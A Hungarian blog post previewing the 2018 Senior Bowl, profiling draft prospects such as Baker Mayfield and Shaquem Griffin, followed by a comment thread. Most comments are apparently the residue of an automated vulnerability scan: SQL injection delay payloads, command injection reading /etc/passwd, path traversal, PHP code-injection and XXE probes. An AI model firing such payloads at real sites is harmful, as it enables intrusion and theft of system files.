Senior Bowl 2018

Írta: Drip — 2018. január 27., 09:35

A héten is lesz egy SB!

Senior Bowl 2018


Múlthét szombaton lezajlott a Shrine Game, ezzel megkezdve a draft előtti készülődést, most pedig jöhet a legrangosabb College All-Star meccs. A szisztéma még mindig ugyanaz, vagyis a legjobbnak vélt végzős (vagy egyetemi játékengedéllyel ugyan bíró, de már lediplomázott) játékosok kerülnek be a keretbe, 3 napos edzés előzi meg a főmérkőzést, ahol természetesen az összes NFL csapat megfigyelői kint vannak, valamint a média is képviselteti magát. A North csapat edzője ezúttal Vance Joseph (Denver Broncos HC), a South csapaté pedig Bill O’Brien (Houston Texans HC) lesz. További érdekesség, hogy Baker Mayfield szereplésével 2010 óta (Tim Tebow) most fordul elő először, hogy Heisman győztes vesz részt a Senior Bowlon.

Hasonlóan a Shrine Game bemutatóhoz, most is következzék néhány játékos, akire érdemes lesz nem csak a meccs, de a draft miatt is figyelni:

 

 1. Baker Mayfield – QB (Oklahoma)

Kezdjük a sort rögtön a Sooners irányítójával, akit valószínűleg már nem kell sokaknak bemutatni, hiszen már foglalkoztunk vele az oldalon. Az edzések során kitűnően teljesített, remek időzítéssel passzolt, volt, hogy már akkor elengedte a lasztit amikor a WR még el se szakadt a CB-től de a labda pontosan az elkapó ölébe hullott. Éles szituációban én néha úgy éreztem, hogy fejben még van hova nőnie, az edzések során ezzel nem volt gondja. Természetesen sok csapat interjúzott vele, a vélemények pedig pozitívak voltak.

 

 1. Josh Allen – QB (Wyoming)

Talán az egyik legmegosztóbb irányító prospect. A karerejével nincs gond, sőt elképesztő milyen labdákat képes elengedni, de néha ugyanezt a kijelentést tesszük fel magunkban csak éppen negatív értelemben. A Senior Bowl számára egy következő nagy lépcsőfok lehetett volna, hiszen a Potato Bowl-on jól játszott, ellenben inkább az egész szezonjára jellemző hullámvasutat láthattuk tőle. Voltak elképesztő jó passzai (az idén debütáló Zebra Technologynak hála kiderült, hogy 66 mph-es labdát képes dobni) és voltak egészen pontatlanok is. Természetesen a meccsen még segíthet magán.

 

 1. Allen Lazard – WR (Iowa State)

Nagyszerű kombinációja a magasság, súly és sebesség triójának, ám hasonlóan Allen-hez neki is inkonzisztens hete volt. Az első napon temérdek dropja volt, viszont útvonalait nagyon alaposan futotta meg. Második nap már sikerült visszabillennie és szép napot tudott maga mögött, csütörtökön pedig a kettő keveréke volt. A red-zone drilleknél azonban verhetetlen volt, 2 TD-t is szerzett és igazából bebizonyította, hogy egy mismatch faktorral bíró vörös zónában hasznos elkapó.  

 

 1. Marcus Davenport – DE (UTSA)

A Conference USA legjobb védője kimagaslóan jó futás ellen és fáradhatatlan pass rushban. A szerdai edzésen egy az egy elleni drilleken átlagos volt, viszont a csapat drilleken brillírozott konstans nyomást helyezett az irányítókra és több sack-je is volt.  Csütörtökön azonban senki sem állhatott az útjába és egyszerűen nem tudták blokkolni. Egyelőre még nem egy befejezett projekt de pont ezért nagy az upside benne, és biztos, hogy rengeteg csapat szeretne dolgozni vele, és a keretében tudni.

 

 1. Will Hernandez – OG (UTEP)

A 0-12-es Miners legfényesebb pontja volt Hernandez. A 330 fontos guard egész karrierje során bizonyította, hogy masszívan képes helyt állni futásblokkolásban és passz védelemben is képes volt fejlődni. Kedden kifejezetten jól startolt és mindenkit meglepett a pass protection drilleknél, de ahogy a hét haladt bebizonyosodott, hogy inkább a futás blokkolás az ő asztala. Mindenképpen ott a potenciál benne, hogy NFL guard legyen, de ehhez még fejlődnie kell. Egy jó meccsel a háta mögött kijelenthető, hogy segített a megítélésén. Jelenleg 2. napra tenném.

 

 1. Shaquem Griffin – LB (UCF)

 Igazán érdekes az Ő története, a leginspirálóbb prospectek egyike, akiről bővebben is fog szó esni a közeljövőben. Griffin, habár hiányzik egy kézfeje, atletikus és dominálja az egész pályát, legyen szó a futás megállításáról, a passz levédekezéséről vagy akár az irányító siettetéséről (gondoljunk csak a Peach Bowl-ra az Auburn ellen). Az biztos, hogy a sokoldalúságát letesztelték a héten, hiszen játszott edge rushert, inside linebackert de még high safety poszton is kipróbálták. Összességében nagyszerű hetet zárt, természetesen az egyik legkeresettebb játékos volt interjúk során és el is kápráztatta az őt kérdezőket. Egyes helyekről hallani, hogy ST játékos lehet belőle maximum, én semmiféleképpen sem limitálnám így, sokkal több rejlik benne.

 

 1. Michael Gallup – WR (Colorado State)

Tipikusan az a játékos, aki nem feltűnő, mégis nagyon jó. Nem a méreteivel és sebességével fog párharcot nyerni, sokkal inkább precíz route futásaival, magabiztos kezeivel és bizalomgerjesztő erejével. Az első két nap meg is mutatta miért volt Biletnikoff Award döntős. Szinte lehetetlen volt nem észre venni playmaker készségeit az 1v1 és 11v11 drilleken. Következő nap mélységi passzoknál remekelt, szerzett is egy TD-t. Allen-el és Mayfielddel is hamar megértette magát. Gallup jelenleg a Calvin Ridley és Cameron Sutton által vetett árnyékban bújik, de ez végül is annak a csapatnak a javára válik, aki később ki fogja választani, mivel az egyik legjobb steal lehet a drafton. 

 

 1. Tyrell Crosby – OT (Oregon)

A következő atletikus oregoni támadófalember a sorban. Remekül mozog és ideális karhosszal rendelkezik. Az O-line edzők kifejezetten kedvelték a héten, az 1v1 edzések során jól helyt állt, gyors lábmozgását mindenki szemügyre vehette. Testén még alakítania kell, ahhoz, hogy az NFL-ben is képes legyen jó teljesítményre erősebbnek kell lennie. Mindenesetre a kezdő lépéseket megtette, mivel jó hetet zárt.

 

 1. Rashaad Penny – RB (San Diego State)

Ha van valaki, aki az idei év Kareem Hunt-ja lehet, akkor az Penny. Az összes futó közül Penny bír a legjobb múlttal, az egész NCAA-t vezette 2248 futott yarddal és 23 TD-vel, amivel Donnell Pumhrey és Marshall Faulk rekordjait döntötte meg. Elképesztően erős és atletikus futó, aki a levegőben és visszahordásoknál is veszélyes tud lenni. Nehezen rázódott bele az edzésekbe, volt fumble-je és néhány false start-ja de sikerült megvillogtatnia tudását is. Patrick Woo Senior Bowl Scouting Director a következőket mondta: „Imádom Penny-t! Nagy, erős és gyors. Két olyan játékos van az idei drafton akik még ezzel rendelkeznek: Saquon Barkley és Sony Michel.” Hogy Penny-t hol fogják draftolni igen fogós kérdés. Ha a fenti Hunt hasonlatból indulok ki akkor reális a 3. kör.

 

 1. James Washington – WR (Oklahoma State)

James Washington, az idei draft egyik szélvésze, remek edzéshetet tudhat magáénak. A Biletnikoff Award győztessel kapcsolatban rengeteg kétely volt. Képes lesz-e a spread offense-n kívül is ilyen prdouktív maradni, alacsony mérete limitálhatja -e a pálya szélén stb. Nos a lehető legmegfelelőbben halkította el a kétkedőket: Mindent elkapott, ami felé érkezett és mellé tökéletes route-okat futott és természetesen sebességét is megvillantotta. E hét után számítsunk rá, hogy egyre többet találkozunk a nevével az 1. körös mockokban.

 

 1. Michael Joseph – CB (Dubuque)

Joseph egyértelműen az a játékos, kinek ha a neve elhangzik visszakérdezünk, hogy „Kicsoda?”. A Senior Bowl remek lehetőség az ilyen játékosok számára, akiket még a scoutok is csak most fedeznek fel. Joseph úgy jött ki az edzésekre mintha nem is a Division III-ból érkezett volna és mindenkit lenyűgözött. A mély labdáknál jól védekezett és Braxton Berrios WR-t, aki nem rég még az Orange Bowl-on lépett pályára a Miami-val, sikeresen eltüntette. További érdekesség, csakhogy lehessen még szurkolni Josephnek, hogy eddig az NFL történetében mindössze egy játékost draftoltak a Dubuque egyetemről, 1967-ben Paul Krause HOF safety-t.

 

 1. DaeSean Hamilton – WR (Penn State)

Hamilton neve múlthétről ismerős lehet. Nem hiába, jó teljesítménye a Shrine Game-n Senior Bowl meghívót ért és bizony itt sem adta lentebb. Az egyik legjobb route futó volt az edzéseken, időzítése és türelme pedig figyelemfelkeltő.

 

 1. Ogbonnia Okoronkwo – LB/DE (Oklahoma)

„Én vagyok a legjobb passzsiettető az NFL Drafton.”

A Big12 Év védője nem küszködik önbizalomhiánnyal, nem is csoda, hisz Sooners karrierje során 164 tackle-t és 21 sack-et szerzett. Sokan megkérdőjelezték azonban, hogy fog tudni fellépni a testesebb NFL tackle-kkel szemben és a keddi edzéseken mintha kicsit rozsdás is lett volna, nem ment neki. Ellenben a következő két nap sikerült belelendülnie és el is hallgattatta a kétkedőit. Pass Rush drilleknél már ugyanazt a terrort tudta nyújtani, amihez Oklahomában hozzászoktak, ráadásul a futás elleni gyakorlatoknál is impresszív volt, és a nála legalább 60 fonttal nehezebb falembereket is letudta gyűrni, választ szolgáltatva ezzel a fenti kérdésre. Azok a csapatok akik 3-4es védelmet játszanak, könnyen szerelembe esnek majd.

 

 1. Fred Warner – LB (BYU)

Azon játékosok egyike, aki sokat profitált az edzésekből. Gyorsan és könnyedén mozgott, rengeteg területet lefedett, nem csak futásnál de cover feladatoknál is, emellett pedig vezér volt a védelemben több alkalommal is rendezgette a társait a pályán. Sokoldalúsága miatt akár középen, akár szélen is fellehet állítani.

 

 1. Braxton Berrios – WR (Miami)

A tradicionális slot elkapó. Jó kezei vannak, de hajlamos az elejtett labdákra, erre mentálisan kell odafigyelnie. Ettől eltekintve rövid útvonalon gyorsasága miatt hamar képes tisztára játszani magát. Nem fél a pálya közepén sem. A megfelelő rendszerben igazi fejfájást tud majd okozni az ellenfélnek. Már most népszerű a Julian Edelman hasonlat.

 

A mérkőzés szombaton 20:30-kor kezdődik


Hozzászólások

több mint 6 éve
Egon bá New England Patriots 13 — Saints GM
Köszi😊

Akár azt gondolod, hogy képes vagy valamire, akár azt, hogy nem, mindenképpen igazad van. Henry Ford
JUST WIN!!!
több mint 6 éve
juz3r New York Giants Ole Miss Rebels 2
Ezt a meccset hol lehet megnézni? Az ESPN Player-en nem jelzik a meccset, vagyis ott hiába fogom keresni. Valami stream? Help me! 😊

Hotty Toddy!
több mint 6 éve
r.baggio New Orleans Saints Tulane Green Wave 241 — Don’t whine, don’t complain, don’t make excuses
NFL Network, itt találsz hozzá streameket:  www.reddit.com/r/nflstreams/comments/7ols5e/channel_thread_nfl_network/ - de youtube-ra is felkerül majd a teljes meccs


---
"Nincs igazság és nincs emberiség. Csak igazságok vannak és emberek." - Szerb Antal
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
response.write(9978566*9342867)
több mint 5 éve
Törölt felhasználó
'+response.write(9978566*9342867)+'
több mint 5 éve
Törölt felhasználó
"+response.write(9978566*9342867)+"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
&cat /etc/passwd&
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'&cat /etc/passwd&'
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20 and sleep(4)
több mint 5 éve
Törölt felhasználó
"&cat /etc/passwd&"
több mint 5 éve
Törölt felhasználó
20 or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
cat /etc/passwd
több mint 5 éve
Törölt felhasználó
20' and sleep(4)='
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
`cat /etc/passwd`
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20' and (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
|cat /etc/passwd#
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20" and sleep(4)="
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
'|'ld
több mint 5 éve
Törölt felhasználó
20' or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
${99082+100094}
több mint 5 éve
Törölt felhasználó
"|"ld
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
20" or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
268435455
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
;cat /etc/passwd;
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
több mint 5 éve
Törölt felhasználó
20'=sleep(4)='
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
';cat /etc/passwd;'
több mint 5 éve
Törölt felhasználó
1some_inexistent_file_with_long_name%00.jpg
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
20&n941028=v970094
több mint 5 éve
Törölt felhasználó
20"=sleep(4)="
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
)
több mint 5 éve
Törölt felhasználó
";cat /etc/passwd;"
több mint 5 éve
Törölt felhasználó
/../..//../..//../..//../..//../..//etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt?%00.jpg
több mint 5 éve
Törölt felhasználó
1e309
több mint 5 éve
Törölt felhasználó
20;select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
||cat /etc/passwd
több mint 5 éve
Törölt felhasználó
testasp.vulnweb.com
több mint 5 éve
Törölt felhasználó
!(()&&!|*|*|
több mint 5 éve
Törölt felhasználó
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
több mint 5 éve
Törölt felhasználó
'"\'\");|]*{
<>
több mint 5 éve
Törölt felhasználó
'"()
több mint 5 éve
Törölt felhasználó
&dir
több mint 5 éve
Törölt felhasználó
20';select pg_sleep(4); --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
^(#$!@#$)(()))******
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
/etc/passwd
több mint 5 éve
Törölt felhasználó
20; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'&dir&'
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20'; waitfor delay '0:0:4' --
több mint 5 éve
Törölt felhasználó
"&dir&"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
több mint 5 éve
Törölt felhasználó
;print(md5(acunetix_wvs_security_test));
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
|dir
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/xss.html?%00.jpg
több mint 5 éve
Törölt felhasználó
';print(md5(acunetix_wvs_security_test));$a='
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'|dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
";print(md5(acunetix_wvs_security_test));$a="
több mint 5 éve
Törölt felhasználó
acunetix_wvs_invalid_filename
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"|dir
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
file:///etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
több mint 5 éve
Törölt felhasználó
1'"
több mint 5 éve
Törölt felhasználó
${@print(md5(acunetix_wvs_security_test))}\
több mint 5 éve
Törölt felhasználó
comment
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
WEB-INF/web.xml
több mint 5 éve
Törölt felhasználó
\
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
comment/.
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
//www.acunetix.tst
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
@@bf6gr
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../windows/win.ini
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó


]>
&acunetixent;
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../boot.ini
több mint 5 éve
Törölt felhasználó
JyI=
több mint 5 éve
Törölt felhasználó
'"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó